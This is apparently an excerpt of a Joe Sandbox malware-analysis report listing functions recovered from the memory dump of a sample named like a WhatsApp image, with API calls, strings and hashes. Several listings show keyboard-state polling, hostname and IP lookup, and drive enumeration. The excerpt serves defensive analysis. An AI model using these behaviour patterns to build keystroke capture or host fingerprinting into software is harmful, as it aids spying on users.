_memset.LIBCMT ref: 000D0542
SHBrowseForFolderW.SHELL32(?), ref: 000D057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000D05A1
CoTaskMemFree.OLE32(00000000), ref: 000D05A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 000D05DF
CoUninitialize.OLE32(00000001,00000000), ref: 000D05E1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 7744e340c7a452f9ab8a71c0819c7b95c911d3162014222638103e75e260723d
Instruction ID: 23182f05ae6cbc6206b04b8f9bf476e0b29ac7352cddaf0124cc0a4de68e64dc
Opcode Fuzzy Hash: 7744e340c7a452f9ab8a71c0819c7b95c911d3162014222638103e75e260723d
Instruction Fuzzy Hash: 74B1CC75A00209AFDB04DFA4D889EAEBBB9FF48314F148459F949EB251D770ED41CB60

Function 000C2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000C2ED6
SetKeyboardState.USER32(?), ref: 000C2F41
GetAsyncKeyState.USER32(000000A0), ref: 000C2F61
GetKeyState.USER32(000000A0), ref: 000C2F78
GetAsyncKeyState.USER32(000000A1), ref: 000C2FA7
GetKeyState.USER32(000000A1), ref: 000C2FB8
GetAsyncKeyState.USER32(00000011), ref: 000C2FE4
GetKeyState.USER32(00000011), ref: 000C2FF2
GetAsyncKeyState.USER32(00000012), ref: 000C301B
GetKeyState.USER32(00000012), ref: 000C3029
GetAsyncKeyState.USER32(0000005B), ref: 000C3052
GetKeyState.USER32(0000005B), ref: 000C3060

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 1dfe2d5d74410adbe017170eeb976b26ba5cbc76957025055bd3c153938894dd
Instruction ID: d222f25a6a731c1141f05e04457e253d0b7939a3a5c8f61c23119162f511fc5e
Opcode Fuzzy Hash: 1dfe2d5d74410adbe017170eeb976b26ba5cbc76957025055bd3c153938894dd
Instruction Fuzzy Hash: 0951E721A0478829FB75EBB48811FEEBFF45F11340F08859DD5C2565C3DA949B8CCBA2

Function 000BED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 000BED1E
GetWindowRect.USER32(00000000,?), ref: 000BED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 000BED8E
GetDlgItem.USER32(?,00000002), ref: 000BED99
GetWindowRect.USER32(00000000,?), ref: 000BEDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 000BEE01
GetDlgItem.USER32(?,000003E9), ref: 000BEE0F
GetWindowRect.USER32(00000000,?), ref: 000BEE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 000BEE63
GetDlgItem.USER32(?,000003EA), ref: 000BEE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000BEE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 000BEE9B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: be05483d284d69738618470231895f4e160a59584e6382824fe146e5a326859e
Instruction ID: eb822706c771fda05c8d53910a44d2be3aa16abd404547272301c28df29a9aa4
Opcode Fuzzy Hash: be05483d284d69738618470231895f4e160a59584e6382824fe146e5a326859e
Instruction Fuzzy Hash: 6A510FB1B00205AFDB18CFA9DD85AAEBBFAFB88700F148129F519D7291D7B1DD408B10

Function 0009B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0009B759,?,00000000,?,?,?,?,0009B72B,00000000,?), ref: 0009BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0009B72B), ref: 0009B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 0009B88D
DestroyAcceleratorTable.USER32(00000000), ref: 000FD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0009B72B,00000000,?,?,0009B2EF,?,?), ref: 000FD90A
DeleteObject.GDI32(00000000), ref: 000FD91C

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 2040d5cffeca250c258f5bb9fb4e0b60f60c105ffe38c3e6d6c5ba57837311eb
Instruction ID: be7741a3a31942562ed4f614356e62d5413fa3194e3f7d52e7082ba2b7f0813a
Opcode Fuzzy Hash: 2040d5cffeca250c258f5bb9fb4e0b60f60c105ffe38c3e6d6c5ba57837311eb
Instruction Fuzzy Hash: 27619B30505604EFDB359F94EA88B7AB7F6FB85321F15451AE58686E70CBB0A8C0EB40

Function 0009B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0009B526: GetWindowLongW.USER32(?,000000EB), ref: 0009B537

GetSysColor.USER32(0000000F), ref: 0009B438

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: af859586b404cdcad08da50e261eb9cdec0df8818a1d65c86ac3718ad679c2cb
Instruction ID: 3bb84e45bae0859efe0909eef188d6f8d1a4a5a889ded72799144dd397a6d6f8
Opcode Fuzzy Hash: af859586b404cdcad08da50e261eb9cdec0df8818a1d65c86ac3718ad679c2cb
Instruction Fuzzy Hash: A4419330100144AFDF206F68ED89BB93BA6EB46731F144261FEA58E5E6D7708C81FB21

Function 000C690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 000C6923
_wcscpy.LIBCMT ref: 000C6934
__wsplitpath.LIBCMT ref: 000C6958
__wsplitpath.LIBCMT ref: 000C6979
_wcscpy.LIBCMT ref: 000C699B
_wcscpy.LIBCMT ref: 000C69B9
_wcscpy.LIBCMT ref: 000C69C7
_wcscat.LIBCMT ref: 000C69D6
_wcscat.LIBCMT ref: 000C6A2B
_wcscat.LIBCMT ref: 000C6A61
_wcscat.LIBCMT ref: 000C6A73

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 63bd8925291d64a428b64e9cde7585966e37a2a286ef1bf38d2dd3a58dafdbef
Instruction ID: c8c5b851a6230d2866208f8a32bfb4a135d0ed6635da0e612ae49417fcd37b0c
Opcode Fuzzy Hash: 63bd8925291d64a428b64e9cde7585966e37a2a286ef1bf38d2dd3a58dafdbef
Instruction Fuzzy Hash: 38414D7788521CAECF61EB90CC41DCF73BDEB44310F0041A6B649A2052EA31ABE98F51

Function 000CD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0011DC00,0011DC00,0011DC00), ref: 000CD7CE
GetDriveTypeW.KERNEL32(?,00133A70,00000061), ref: 000CD898
_wcscpy.LIBCMT ref: 000CD8C2

Strings

all, xrefs: 000CD7D4
fixed, xrefs: 000CD816
unknown, xrefs: 000CD859
ramdisk, xrefs: 000CD842
removable, xrefs: 000CD800
cdrom, xrefs: 000CD7EA
network, xrefs: 000CD82C

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: b75bec5940c8b64172a8085b005b7dbe7d507c6fcd8696da3a3ef11a60e8e1af
Instruction ID: 183e777bbe3cb6a8de8e027ed23dcb0a4c4bc629f8180a7c63c08eae186be6c7
Opcode Fuzzy Hash: b75bec5940c8b64172a8085b005b7dbe7d507c6fcd8696da3a3ef11a60e8e1af
Instruction Fuzzy Hash: 6F515C75104240AFD710EF14D891FAEB7A5FF84314F10892EF5AA972A2EB31DD09DB42

Function 0008936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 000893AB
__itow.LIBCMT ref: 000893DF

Part of subcall function 000A1557: _xtow@16.LIBCMT ref: 000A1578

Strings

True, xrefs: 000F4C8C
False, xrefs: 000F4C93
%.15g, xrefs: 000893A5
0x%p, xrefs: 000F4CAD

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: fd81776a81155f3141eca2d915db92a471d2e9a992448f40fdc96e6a18998157
Instruction ID: b8f36424365730b95dbb406f9f95581dded283f297f807caaa27d29998e78eda
Opcode Fuzzy Hash: fd81776a81155f3141eca2d915db92a471d2e9a992448f40fdc96e6a18998157
Instruction Fuzzy Hash: 6141E471504209ABEB64FB74D942EBA73F8FF49310F24446EE58AD7182EA319A41DB50

Function 000EA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 000EA259
CreateCompatibleDC.GDI32(00000000), ref: 000EA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 000EA273
SelectObject.GDI32(00000000,00000000), ref: 000EA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 000EA286
DeleteDC.GDI32(00000000), ref: 000EA28F
GetWindowLongW.USER32(?,000000EC), ref: 000EA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 000EA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 000EA2B9

Strings

static, xrefs: 000EA1F1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 1ecbfb81ddc949f75be67e52d1073b65edf66ae93a77816e003c24c4594bd27c
Instruction ID: 021fec1f84cec77bcc1605bbc6d4baa3a7d80c07f2018f574f97e6276706f08b
Opcode Fuzzy Hash: 1ecbfb81ddc949f75be67e52d1073b65edf66ae93a77816e003c24c4594bd27c
Instruction Fuzzy Hash: FB318F31200155BFDF115FA5EC49FEA3BA9FF0E360F110218FA59A60A0CB76E851DB64

Function 000C6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000C6F1D
gethostname.WSOCK32(?,00000100), ref: 000C6F37
gethostbyname.WSOCK32(?), ref: 000C6F44
_wcscpy.LIBCMT ref: 000C6F6C
inet_ntoa.WSOCK32(?), ref: 000C6F8A
_strcat.LIBCMT ref: 000C6F98
_wcscpy.LIBCMT ref: 000C6FAF
WSACleanup.WSOCK32 ref: 000C6FBD
_wcscpy.LIBCMT ref: 000C6FCB

Strings

0.0.0.0, xrefs: 000C6F66

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 531753235a35770a6809d08c2f211abbb8bc096840cc89371a7a71215d1cc83d
Instruction ID: 51f1ce9e0560a8d398ea55e9ecbfee576a9d93634738f95107d1abcc4f60bb78
Opcode Fuzzy Hash: 531753235a35770a6809d08c2f211abbb8bc096840cc89371a7a71215d1cc83d
Instruction Fuzzy Hash: E511D272904119ABCB35ABA0EC4AFDE77A8EB45710F0000BDF145A6082EFB19A828A50

Function 000A500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000A5047

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

__gmtime64_s.LIBCMT ref: 000A50E0
__gmtime64_s.LIBCMT ref: 000A5116
__gmtime64_s.LIBCMT ref: 000A5133
__allrem.LIBCMT ref: 000A5189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A51A5
__allrem.LIBCMT ref: 000A51BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A51DA
__allrem.LIBCMT ref: 000A51F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000A520F
__invoke_watson.LIBCMT ref: 000A5280

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: d125b0fba58530c81b954585d4637ca03f1f8229af39adfbd2039819f9a3bb60
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 5671D772A00F16ABE7149EB8CC91BEA73E8BF16765F144229F514DB682E770DD408BD0

Function 000C4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C4DF8
GetMenuItemInfoW.USER32(00141708,000000FF,00000000,00000030), ref: 000C4E59
SetMenuItemInfoW.USER32(00141708,00000004,00000000,00000030), ref: 000C4E8F
Sleep.KERNEL32(000001F4), ref: 000C4EA1
GetMenuItemCount.USER32(?), ref: 000C4EE5
GetMenuItemID.USER32(?,00000000), ref: 000C4F01
GetMenuItemID.USER32(?,-00000001), ref: 000C4F2B
GetMenuItemID.USER32(?,?), ref: 000C4F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000C4FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C4FEB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: f803a0f9bc4c285cda3b50ba6d6a2fd97ed89abc7643276465848f476ccdebb6
Instruction ID: 12ce594e23e06752c53e2cd0ac4ce4032a39b3dab337192585011b4c1a4b39df
Opcode Fuzzy Hash: f803a0f9bc4c285cda3b50ba6d6a2fd97ed89abc7643276465848f476ccdebb6
Instruction Fuzzy Hash: E5616975900249AFEB21CFA4DC98EAE7BF8BB45308F14006DF841A7291D771AD86CB21

Function 000E9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000E9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000E9C9B
GetWindowLongW.USER32(?,000000F0), ref: 000E9CBF
_memset.LIBCMT ref: 000E9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000E9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000E9D5A

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: b28b349996e867088f9e828dd33dc13412fd0c24c7474bd4998ce765a7ce3337
Instruction ID: 38cf95d16198beac0bfb1fc6d5c4b6ce2f81fa1ea3e30b0db0a584b43904fae5
Opcode Fuzzy Hash: b28b349996e867088f9e828dd33dc13412fd0c24c7474bd4998ce765a7ce3337
Instruction Fuzzy Hash: 45617DB5A00248AFDB10DFA4CC81EEE77B8EF09714F14415AFA15E72A2D7B0AD81DB50

Function 000B94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 000B94FE
SafeArrayAllocData.OLEAUT32(?), ref: 000B9549
VariantInit.OLEAUT32(?), ref: 000B955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 000B957B
VariantCopy.OLEAUT32(?,?), ref: 000B95BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 000B95D2
VariantClear.OLEAUT32(?), ref: 000B95E7
SafeArrayDestroyData.OLEAUT32(?), ref: 000B95F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000B95FD
VariantClear.OLEAUT32(?), ref: 000B960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000B961A

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 3e5a5de37caf90225dca166fc47151738ef8f1b83d6c097d31c4fbfdc4201f7a
Instruction ID: a9ab57291062fa7cebb7e3ccb951181ae967331a12e402ecafd64a1f8aeb17ba
Opcode Fuzzy Hash: 3e5a5de37caf90225dca166fc47151738ef8f1b83d6c097d31c4fbfdc4201f7a
Instruction Fuzzy Hash: 70412C75A00219AFCB01EFE4D8849DEBBB9FF48354F008065E552E3661DB71EA85CBA1

Function 000DADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

CoInitialize.OLE32 ref: 000DADF6
CoUninitialize.OLE32 ref: 000DAE01
CoCreateInstance.OLE32(?,00000000,00000017,0010D8FC,?), ref: 000DAE61
IIDFromString.OLE32(?,?), ref: 000DAED4
VariantInit.OLEAUT32(?), ref: 000DAF6E
VariantClear.OLEAUT32(?), ref: 000DAFCF

Strings

Invalid parameter, xrefs: 000DAEED
NULL Pointer assignment, xrefs: 000DAEA6
Failed to create object, xrefs: 000DAE6C, 000DAF22

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 7e1937edb340057ff64c444631255322f6b1ede182d498d957df598029ee64fe
Instruction ID: 6294ee24b858aa8f11bfad1805de81332f086669c7ae11c0c10017290073ffbf
Opcode Fuzzy Hash: 7e1937edb340057ff64c444631255322f6b1ede182d498d957df598029ee64fe
Instruction Fuzzy Hash: F5619D71308301AFC720EF94D844BAEB7E8AF4A714F14455AF9859B292C770ED44CBA3

